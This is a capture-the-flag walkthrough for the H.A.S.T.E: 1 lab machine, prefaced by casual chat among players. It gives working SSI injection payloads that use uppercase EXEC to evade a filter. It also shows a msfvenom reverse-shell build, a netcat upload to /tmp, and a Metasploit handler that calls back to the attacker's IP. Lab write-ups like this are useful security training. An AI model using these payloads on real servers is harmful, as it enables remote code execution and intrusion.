I learned a new attack vector: SSI injection. Thanks.
- ch3rn0byl: we just started the haste one if you want to do it (00:28)
- H4v0k: boot it up amon , sleep is for the weak (00:31)
- ch3rn0byl: sleep is for the bitchesssssss (00:32)
- ch3rn0byl: fucking haste (02:38)
Note, if you want to learn more about windows exploit development you can read the ch3rn0byl’s blog: here.
Name: H.A.S.T.E: 1
Date release: 13 Sep 2017
Web page: https://securityshards.wordpress.com/2017/09/13/new-h-a-s-t-e-hacking-challenge/
Aim: get any kind of shell in the system.
We can find the IP address of the system with
Nmap find only one port open.
[email protected]:~/Desktop# nmap 192.168.1.46 Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-15 08:38 CEST Nmap scan report for yoda.home (192.168.1.46) Host is up (0.029s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open http MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology) Nmap done: 1 IP address (1 host up) scanned in 61.85 seconds [email protected]:~/Desktop#
With a quick enumeration of the structure of the website we can find an
SSI page where an
ls command is executed and different pages with the
.shtml extension. If you google
shtml on google you will find interesting documents and one attack vector.
Due to a non sanitised input in the HTTP form we can execute commands on the system.
Request Body: Content-Type: application/x-www-form-urlencoded Content-Length: 94 xxx=Offsec&feedback=<!--#EXEC cmd="whoami; id; pwd" -->
Note that the normal way to execute a command with SSI injection is to use the
exec keyword instead of
EXEC but after few try the exec string seems to be remove after the form validation, in the PHP page.
From RCE to Reverse Shell
As usual, we generate a reverse shell with
[email protected]:~/Desktop# msfvenom --platform linux -p linux/x86/meterpreter/reverse_tcp LPORT=1337 LHOST=192.168.1.107 -f elf -o rshell No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 123 bytes Final size of elf file: 207 bytes Saved as: rshell [email protected]:~/Desktop#
Then, we upload the reverse shell into the system.
#Attacker command nc -nvv 192.168.1.46 1337 < rshell #SSI injection command <!--#EXEC cmd="/bin/nc -lvvp 1337 > /tmp/rshell" -->
We configure our
[email protected]:~/Desktop# msfconsole -q msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp PAYLOAD => linux/x86/meterpreter/reverse_tcp msf exploit(handler) > set LPORT 1337 LPORT => 1337 msf exploit(handler) > set LHOST 192.168.1.107 LHOST => 192.168.1.107 msf exploit(handler) > run [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.1.107:1337 msf exploit(handler) >
We change the permission and we execute the reverse shell.
#Set permission to executable <!--#EXEC cmd="chmod +x /tmp/rshell" --> #Execute the reverse shell <!--#EXEC cmd="/tmp/rshell" -->